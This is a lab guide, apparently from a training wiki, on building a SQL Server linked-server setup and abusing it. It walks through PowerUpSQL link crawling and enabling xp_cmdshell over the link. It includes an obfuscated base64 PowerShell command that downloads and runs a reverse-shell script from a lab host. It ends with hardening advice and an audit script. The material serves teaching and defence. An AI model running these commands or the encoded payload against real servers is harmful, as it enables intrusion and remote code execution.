Database-Links

SQL Servers can be configured to link to other SQL Servers.


Last updated 2 years ago

Configuring

Prerequisite

Configuring SQL user on Data01

1. Log in to DATA01 as the Administrator user with password Welcome01!.

2. Open "Microsoft SQL Server Management Studio".

3. Log in with the Administrator user using Windows Authentication.

4. Right click on the server object "Data01\Data (SQL Server 15.0.2000.5)" and select "Properties".

5. Open the "Security" tab and select "SQL Server and Windows Authentication mode" under "Server authentication".

6. Open "SQL Server 2019 Configuration Manager".

7. Restart the two SQL services with "DATA" in their name.

8. Open "Microsoft SQL Server Management Studio".

9. Expand "Security" and "Logins". Then right click on "Logins" and select "New Login".

10. Fill in the login name SQL_link and password Eo6#jAzonQhw. Then make sure the three password flags "Enforce password policy", "Enforce password expiration" and "User must change password at next login" are unselected.

11. In the tab "Server Roles" select "setupadmin" and "sysadmin" and click "OK".

12. In the tab "User Mapping" select "Bank Transfers".

Configuring SQL link

1. Log in to WEB01 as the Administrator user with password Welcome01!.

2. Open "Microsoft SQL Server Management Studio".

3. Log in with the Administrator user using Windows Authentication.

4. Expand "Server Objects" and "Linked Servers". Then right click on "Linked Servers" and select "New Linked Server".

5. Fill in Data01.secure.local and select "SQL Server".

6. Open the "Security" tab and select "Be made using this security context". Then fill in the credentials created in the previous section: SQL_link with password Eo6#jAzonQhw.

7. Open the "Server Options" tab and set "RPC Out" to True. This is needed so xp_cmdshell can be enabled through the link during the attack.

Step 7 can be skipped; RPC Out can also be enabled during the attack, after obtaining sa privileges on the Web01 SQL Server, with the following query:

EXEC sp_serveroption @server='DATA01.SECURE.LOCAL', @optname='rpc out', @optvalue='True'

8. Click "OK" and the linked server should show up.

Attacking

How it works

SQL Servers can be linked together to access data on the linked SQL Server. The link is created using a security context, which can be a SQL login or a domain user, and queries sent through the link run with that account's permissions on the remote server. If the account has sysadmin privileges it is possible to execute queries as sysadmin there.

If xp_cmdshell is enabled on the linked server it is possible to execute operating system commands. If RPC Out is enabled on the link, xp_cmdshell can be enabled through it.

Tools

Executing the attack

1. Download PowerUpSQL on the Kali machine and host it on a webserver:

wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1
python3 -m http.server 8090

2. Log in to WS01 as Richard with the password Sample123.

3. Start PowerShell and download and execute an AMSI bypass script and PowerUpSQL in memory.

4. With PowerUpSQL and the Get-SQLServerLink cmdlet we can query the SQL Server links from the current domain:

Get-SQLInstanceDomain | Get-SQLServerLink

5. The output shows that web01.amsterdam.bank.local has a SQL Server link to DATA01.secure.local, a link to another domain. The output also shows that rpc_out is enabled. With the cmdlet Get-SQLServerLinkCrawl we can execute a query through the linked servers:

Get-SQLInstanceDomain | Get-SQLServerLinkCrawl -Query 'select @@version'

We won't see the data from the SQL query since it is wrapped in the CustomQuery object. The query is also executed on both SQL Servers.

6. With the parameter -QueryTarget we can select a target instance to query:

Get-SQLInstanceDomain | Get-SQLServerLinkCrawl -Query 'select @@version' -QueryTarget DATA01\DATA | Select-Object -ExpandProperty CustomQuery

Connecting with HeidiSQL

1. To execute SQL queries and look into the database, start HeidiSQL.

2. Click on "New" at the bottom left and configure the following settings:

  • Network Type: Microsoft SQL Server (TCP/IP)

  • Library: SQLOLEDB

  • Hostname / IP: WEB01.amsterdam.bank.local

  • Select: "Use Windows Authentication"

  • Port: 1433

4. Click "OK" on the security issue warning.

5. In the "Query" tab fill in the following to query the SQL links:

SELECT * FROM master..sysservers;

6. We discovered the same SQL Server link as earlier. We can query the linked server with the following query:

SELECT * FROM OPENQUERY("DATA01.SECURE.LOCAL", 'select @@version');

7. We can query the server to check if xp_cmdshell is on:

SELECT * FROM OPENQUERY("DATA01.SECURE.LOCAL", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

8. The value 0 means xp_cmdshell is disabled. We can try to enable xp_cmdshell with the following queries:

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT "DATA01.SECURE.LOCAL"
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT "DATA01.SECURE.LOCAL"

9. Checking again shows that xp_cmdshell is now enabled.

10. We can execute commands using EXECUTE ... AT:

EXECUTE('exec master..xp_cmdshell ''whoami''') AT "DATA01.SECURE.LOCAL"

11. We could get a reverse shell by executing the following query, using the technique from the Reverse shell trick page:

EXECUTE('exec master..xp_cmdshell ''powershell.exe -w hidden -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIANAA4AC4AMgA6ADgAMAA5ADAALwBhAG0AcwBpAC4AdAB4AHQAIgApADsAIABpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgA0ADgALgAyADoAOAAwADkAMAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACIAKQA=''') AT "DATA01.SECURE.LOCAL"

Cleanup

  1. Execute the following query in HeidiSQL to disable xp_cmdshell again:

EXEC('sp_configure ''xp_cmdshell'', 0; reconfigure;') AT "DATA01.SECURE.LOCAL"
EXEC('sp_configure ''show advanced options'', 0; reconfigure;') AT "DATA01.SECURE.LOCAL"

Defending

Recommendations

  • Configure the link login (SQL_link) with the least privilege possible; don't use the sysadmin role.

  • Disable xp_cmdshell on the SQL Server.

  • Disable RPC OUT on the SQL Server.
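The "How it works" section and the recommendations above can be checked and enforced from T-SQL. The following audit and hardening script is an added example, not from the original page; it assumes it is run on WEB01 (the server holding the link) with the lab's link name DATA01.SECURE.LOCAL, login SQL_link and database "Bank Transfers", and that db_datareader is the only right the application actually needs (an assumption to adjust per application).

```sql
-- Added example: audit a SQL Server link and apply the recommendations above.
-- Assumes it runs on WEB01 against the lab link DATA01.SECURE.LOCAL (names from
-- this page); adjust the link, login and database names for your own servers.

-- 1. Which links exist, which login they use, and is RPC Out enabled?
--    uses_self_credential = 1 means the caller's own login is forwarded;
--    a fixed remote_name (here SQL_link) means every local login that maps
--    to it gets that account's privileges on the remote server.
SELECT s.name                 AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,   -- 1 = EXEC ... AT allowed (what lets sp_configure run remotely)
       ll.uses_self_credential,
       ll.remote_name,
       CASE WHEN ll.local_principal_id = 0 THEN 'all local logins'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. What does the link's security context get on the remote side?
--    This runs under the mapped login, so is_sysadmin = 1 is the finding to fix.
SELECT * FROM OPENQUERY([DATA01.SECURE.LOCAL],
    'SELECT SUSER_SNAME() AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin,
            (SELECT value_in_use FROM sys.configurations
              WHERE name = ''xp_cmdshell'') AS xp_cmdshell_enabled');

-- 3. Hardening on WEB01: turn RPC Out off so the link can no longer run
--    sp_configure / xp_cmdshell on DATA01 via EXEC ... AT.
EXEC sp_serveroption @server = N'DATA01.SECURE.LOCAL',
                     @optname = N'rpc out', @optvalue = N'false';

-- 4. Hardening on DATA01 (run there as an administrator): drop the server
--    roles from the link login, grant only the database role the application
--    needs (db_datareader is an assumption), and keep xp_cmdshell disabled.
ALTER SERVER ROLE sysadmin DROP MEMBER SQL_link;
ALTER SERVER ROLE setupadmin DROP MEMBER SQL_link;
USE [Bank Transfers];
ALTER ROLE db_datareader ADD MEMBER SQL_link;   -- user mapping already exists (setup step 12)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

After step 4, rerunning the query in step 2 should report is_sysadmin = 0 and xp_cmdshell_enabled = 0, and step 3 makes the EXEC ... AT statements used in the attack fail on WEB01.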

Detection

References


PowerUpSQL
HeidiSQL
Reverse shell trick
Normal domain user access